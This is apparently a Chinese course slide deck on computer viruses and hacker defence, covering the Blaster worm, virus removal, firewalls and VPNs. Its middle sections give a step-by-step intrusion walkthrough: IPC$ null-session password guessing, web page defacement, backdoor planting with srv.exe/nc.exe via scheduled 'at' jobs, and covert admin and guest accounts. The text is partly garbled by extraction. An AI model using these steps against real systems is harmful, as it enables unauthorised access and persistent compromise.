《第9章、计算机病毒与黑客防范资料》由会员分享,可在线阅读,更多相关《第9章、计算机病毒与黑客防范资料(23页珍藏版)》请在金锄头文库上搜索。
1、计算机维护技术 第9章、计算机病毒与黑客防范 9.1 计算机病毒解析 1、计算机病毒的来源: 一方面计算机用处很大,另一方面计算机也存在很多可攻击的地方 即安全漏洞,所以出现了计算机病毒。 2、计算机病毒:指能够通过自身复制进行传染,进而起破坏作用的一种 计算机程序。 这类程序的主要特征如下: 程序性、传染性、欺骗性、危害性、隐蔽性、潜伏性、精巧性。 3、计算机病毒的分类: 引导性病毒、文件性病毒、网络型病毒 9.2 计算机病毒 4、病毒程序模型:包括三个部分,即安装模块、感染模块和 破坏模块。 5、计算机病毒的规律和现象。 内存少了1KB。一般病毒程序在内存中占用高端1K的空 间。该空间DO
2、S操作系统管不了,病毒修改内存空间大 小标记单位0413单元中的内容,造成DOS操作系统就 认为机器是少1KB内存空间大小。 引导扇区被抢占。硬盘包括主引导扇区和DOS引导扇区 软盘只有DOS引导扇区。 文件被加长,文件性病毒寄生在可执行文件上,如 COM或EXE文件。 启动程序被修改。 9.3 计算机病毒的防范 1、使用OFFICESCAN软件杀毒 2、使用江民杀毒王杀毒 3、使用瑞星杀毒软件清除病毒。 4、清除冲击波病毒实例。 冲击波病毒是在2003年8月席卷全球计算机网络的一种计算机病毒 当时几乎造成60%的计算机处于瘫痪。 该病毒的特点如下: 病毒名称:Worm.Blaser 发作时间
3、:随机 病毒类型:蠕虫病毒 传播途径:网络/RPC漏洞 依赖系统:Windows2000/XP 病毒尺寸:6176字节 发作现象:冲击疲病毒是利用微软公司在2003年7月21日公布的 RPC漏洞进行传播,有RPC服务且没有打安全补丁的计算机都有 9.4、清除冲击波病毒实例 漏洞,涉及WIN2000、XP、Server2003。计算机感染该病毒 后,系统资源被耗尽,有时会弹出RPC服务终止对话框、反 复得启动、不能收发邮件、不能正常复制和粘贴文件,无 法正常浏览网页,DNS和IIS服务遭到非法拒绝等。 冲击波病毒的清除 1、DOS环境下清除 用DOS系统盘启动,再进入Windows目录下查找ms
4、blast.exe 删除。 2、安全模式下清除 f 启动Windows进入安全模式,搜索C盘,查找msblast.exe文 件,删除。 9.5、清除冲击波病毒实例 3、给系统打补丁,进入微软网站下载系统补丁 Windows2000下载地址: D=c8b8a846-f541-4c15-8c9f- 22354449117&displaylang=en 4、使用瑞星杀毒软件,须升级到15.48.01 9.6、黑客入侵解析 黑客概念:是计算机网络病毒程序,现指那些未经许可就闯入别人 计算机系统的人。 黑客入侵术: 1、密码破解术:通过网络监听用户密码、利用专门 软件破解、获得服务 上的shadow密码
5、文件再破解。 2、特洛伊木马术,常用的木马软件有网络公牛(Netbull)、网络神偷( netthief)、WAY2.4(火凤凰无赖小子)广外女生聪明基因,netspy(网络 精灵),木马往往躲藏在windows的系统目录下,伪装成一个文本文件和 网页文件,通过端口与外界联系。或者改变文件关联方式达到自启动。 从而泄漏信息。 3、监听术:拦截网络接口获取密码如sniffer软件。 9.7、 黑客入侵解析 4、电子邮件技术:佯称自己是系统管理员,给用户发 送邮件要求用户更改密码或在正常的附件中加载木马程 序。 5、系统漏洞术:利用操作系统和应用程序的漏洞。 6、默认帐户术:如unix主机都有FT
6、P和GUEST帐户。 9.8、网络入侵实例解析 1、从因特网上下载流光(Fluxay)V4.71 FOR WinNT/2000/XP。操作演示: 如何探测电子邮件:电子邮件系统一般建立在网络服 务器上,如电子邮件地址xxx表示该电 子邮件存储在网站上,其域名为 P 探测 打开软件-选pop3主机,右击在弹出式菜单中选择 “编辑”,然后“添加”- 使用字典:在主画面中选择pop3主机-右击-编 辑-从列表中添加-一个字典文件。 探测-选择pop3主机,右击-探测用户信息 9.9、网络入侵实例解析 利用IPC进行探测:IPC$是共享“命名管道”的资源,它对于 程序间的通信很重要,在远程管理计算机和
7、查看计算机的共 享资源时使用。利用IPC$可以与目标主机建立一个空的连接 (无需用户名和密码),而利用这个空连接就可以得到目标 主机上的用户列表,并配合字典进行密码尝试。 例探测207.188.221.1-207.188.222.255 确定探测地址:选探测-选择扫描pop3/ftp/nt/sql主机在 主机扫描范围输入207.188.221.1-207.188.222.255 类型选择“NT/98” 选择IPC$主机-右击-检测主机类型看结果。 扫描到开放的主机后,在Windows2k的cmd.exe下键入 Net use IP地址IPC$ “密码“ /user: “用户名” 9.10、网络
8、入侵实例解析 连接成功后,可以更换对方Web主页,键入如下: Copy c:index.htm IP地址C$inetpubwwwroot 其中C$inetpubwwwroot是对方主机主页目录。 留后门,如果想在以后登录该服务器,可以设置telnet 服务,操作步骤如下: 上传srv.exe程序,将流光目录tool文件下的srv.exe复制 到C盘,将srv.exe复制到对方服务器system32目录 Copy c:srv.exe IP地址admin$ 9.11 网络入侵实例解析 获取进程,键入如下命令: Net time IP地址 得到时间,记住这个时间,在稍 后的 时间启动srv.exe
9、,键入 At ip地址 启动telnet的时间 srv.exe 这时用srv.exe 打开的默认端口是99,完成种木马。 再次登录,键入如下命令 telnet IP地址 99 就可再访问该服务器,直接到对方服务器的 c:winntsystem32目录下,这是黑客入侵的全过程 9.12、网络入侵的常用命令 Net 命令 1、假设对方的IP地址是127.0.0.1,获取的用户名是abc, 密码是123456,利用IPC$连接、登录、退出。 IPC$是一种共享空连接。 连接并登录 Net use 127.0.0.1ipc$ “123456” /user: “abc” 退出 Net use 127.0
10、.0.1ipc$ /delte 利用SA用户增加用户,用户名bcd,密码123456 一般SA用户相当系统的超级用户。创建用户: Net use bcd 123456 /add 加入administrator组: Net localgroup administrator bcd /add 设置guset默认用户。 9.13 网络入侵的常用命令 Guest是NT默认用户,无法删除。可激活它并加上密码 激活guest用户: Net user guest /active:yes 增加密码: Net user guest 123456 一旦这样做后,就可以使用guest用户自由登录,并且 不被发现。
11、AT命令:此命令的功能是在特定的日期和时间运行某些 命令和程序. 种木马 假设已经登录了对方主机,键入如下命令: Net time 127.0.0.1 这时系统返回一个时间,如12:1,同时得到新的作业ID=1, 9.14 网络入侵的常用命令 启动一个程序,键入at 127.0.0.1 12:3 nc.exe 在12:3时间执行nc.exe程序,执行该程序,对方99端口就开 放,这就在对方机器上种下一个木马. telnet:远程登录命令,在正常情况下需要用户名和密 码,如果利用种下的木马,可以真接打开端口。如 telnet 127.0.0.1 99 FTP:是文件传输命令 例 设FTP服务器为
12、 用户名为abc,密码为 123,用FTP命令实现文件双向传输。 登录: ftp 将本机c:index.htm 文件传送到对方d:下 Put c:index.htm d: 将对方d:index.htm 文件传送到本机c:下 Get d:index.htm c: 9.15 网络入侵的常用命令 Net star :显示网络连接、路由表和网络接口信息,可以 让用户得知目前有哪些网络连接正在运作。 在本机上使用netstar命令。 $ netstar 9.16 黑客防范技术 1、基本防范方法 将磁盘分区转换为NTFS格式。 远程访问(RAS)防范 访问单一服务器:限定所有远程用户访问单一服务器 使用其
13、他协议:RAS服务器一般都使用TCP/IP协议,而 TCP/IP协议比较容易受攻击,改为IPX/SPX 和netbeui. 用户地址绑定,将用户名、密码、网卡和计算机名绑定。 及时更新安全漏洞补救程序。 2、防火墙技术 防火墙是一种用来加强网络之间访问控制的特殊网络 互联设备。放在内网和外网之间,根本任务是阻止外网用 户非法入侵,但不能阻止外网和内网之间的正常通信。 9.17 黑客防范技术 1、通常使用的安全控制手段有 包过滤、 状态检测 代理服务。 代理服务是运行于内部网络和外部网络之间的主机 之上的一种应用。当用户需要访问代理服务器另一侧 的主机时,对符合安全规则的连接,代理服务器会代 替
14、主机响应,并重新各主机发出一个相同的请求,当 此连接请求得到回应度建立起连接之后,内部主机同 外部主机之间的通信将通过代理程序映射相应边接实 现。 9.18 黑客防范技术 2、防火墙产品:分为硬件防火墙和软件防火墙 华堂防火墙:一种智能过滤型软硬件一体化防御系统 网络卫士防火墙 瑞星软件防火墙:提供网络实时过滤监控功能,可防御各种木马 的恶意攻击(如BO、冰河)冲击波病毒主要是通过TCP的135、 4444端口和UDP的99端口进行攻击。 9.19 黑客防范技术 3、瑞星防火墙设置举例: 下载瑞星防火墙软件演示: 4、网络入侵检测:是对防火墙的合理补充,帮助系统 对网络攻击,扩展了系统管理员的
15、安全管理能力,从 网络中若干关键点收集信息,看网络中是否有违安全 策略的行为和遭到袭击的迹象。是典型的防黑客攻击 技术,代表产品有华依网络入侵检测系统。 9.20 VPN虚拟专用网 1、VPN虚拟专用网组建 2、VPN示意图 9.21 网络安全体系结构 网络安全体系结构:从层次上讲包括网络级安全、应用级安全、系 统级安全和管理安全。 解决网络安全常用手段: 防病毒软件 防火墙 入侵检测 虚拟网络(VLAN)指根据交换机端口(指静态虚拟局域网)或 MAC地址(动态虚拟局域网)将主机和相关客户机划分为一组,形成虚 拟局域网.。 虚拟专用网(VPN):是企业网在因特网上的延伸。通过一个专 有通道在公共网络上创建一个安全的专的连接。 加密技术:加密网络不依赖于网络传输途径,是通过对数据本身 的加密来保障网络安全性 9.22 网络安全体系结构 认证技术:解决网络通信过程中通信双方的身份认可。 常用认证方法 User/assword 认证:常用于操作系统登录telnet ,此认证方式不加 密,容易被监听和解密。 使用摘要算法认证:adius(拔号认证协议)OSPf(路由协议) ecurity protocol等均使用共享的Security Key,加上摘要算法 基于认证:使用公开密钥体系进行认证和加密,
